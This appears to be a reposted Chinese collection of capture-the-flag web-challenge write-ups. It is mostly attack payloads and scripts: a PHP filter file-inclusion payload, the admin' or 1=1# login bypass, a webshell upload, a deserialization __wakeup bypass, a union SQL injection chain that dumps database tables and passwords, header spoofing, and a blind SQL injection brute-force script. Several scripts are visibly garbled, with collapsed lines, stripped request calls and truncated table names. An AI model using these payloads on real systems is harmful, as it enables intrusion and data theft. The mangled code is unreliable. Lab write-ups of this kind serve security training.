在源码之中得到一个php页面
后面页面之中
根据提示抓包,在其中返回的页面得到了信息
得到源码,根据源码,发现存在文件包含漏洞
利用php伪协议,获取flag.php的信息,拿取flag
payload:
?file=php://filter/read=convert.base64-encode/resource=flag.php
源码中发现代码
构造输入,获取flag
利用万能密码,直接得到flag
admin' or 1=1#
能上传phtml类型文件
不能包含<?
所以使用javascript中的语法,调用php,实现一句话木马
利用蚁剑连接,拿到flag
经过测试,找到了www.zip这个备份文件。
index.php中找到了一个反序列化的php函数:
class.php里面存在一个类:
根据类里面的信息,需要绕过__wakeup()获取flag,具体可以更改序列化后类属性的字段,大于本身的字段就可以绕过。
私有属性反序列化之后,其属性名前面需要加�。
payload:
import requests
s = 'O:4:"Name":3:{s:14:"�Name�username";s:5:"admin";s:14:"�Name�password";i:100;}'
url = '/?select='
r = (url+s)
r.text
菜刀连接,在根目录找到flag
首先尝试万能密码admin’ or 1=1#,成功登录进去
尝试在username注入:
// order by 注入查看字段,检查出字段为3
?username=admin%27+order+by+4%23&password=123//联合注入,查找数据库
?username=admin1%27+union+select+1,2,group_concat(schema_name)+from+information_schema.schemata%23&password=123
//information_schema,test,performance_schema,mysql,geek,geek是当前数据库//搜索geek数据库的表名
?username=admin1%27+union+select+1,2,group_concat(table_name)+from+information_schema.tables+where+table_schema='geek'%23&password=123
//geekuser,l0ve1ysq1//查询表l0ve1ysq1
?username=admin1%27+union+select+1,2,group_concat(column_name)+from+lumns+where+table_schema='geek'+and+table_name='l0ve1ysq1'%23&password=123
//id,username,password//查询password字段,得到flag
?username=admin1%27+union+select+1,2,group_concat(password)+from+l0ve1ysq1%23&password=123
页面提示,访问Secret.php,首字母记得大写。。。
上burp,加Rerferer
改UA
加XFF
拿到flag
sql盲注,但是注入点被隐藏了,可以在源码中找到
更改源码并输入选择后,跳转到了search.php界面,并且是get传参,之后,检查过滤字符,初步检查过滤了空格,还有内联注释,不能直接内联注释绕过了,改用括号代替空格,最后脚本:
ps: 二分法还是快很多的,延迟也加上,没加延时收到很多错误数据,自己电脑太差了😭
import requests
import sys
import timeurl = ".php?id=1^"s = ''
for i in range(1,1000):left = 30right = 130while left != right:time.sleep(0.1)mid = (left+right)//2#url1 = url+"(ascii((substr((select(database())),%d,1)))>%d)" % (i, mid) # 获取数据库# 获取表名#url1 = url+"(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),%d,1))>%d)" % (i, mid)# 获取列名#url1 = url+"(ascii(substr((select(group_concat(column_name))from(lumns)where(table_name)='Flaaaaag'),%d,1))>%d)" % (i, mid)# 读取数据url1 = url+"(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)" % (i, mid)#print(url1)r = (url1)if "ERROR" :left = mid+1else:right = midif left == 30:breakelse:s += chr(left)print(s)
print(s)本文发布于:2024-02-05 06:37:03,感谢您对本站的认可!
本文链接:https://www.4u4v.net/it/170726436063933.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
| 留言与评论(共有 0 条评论) |
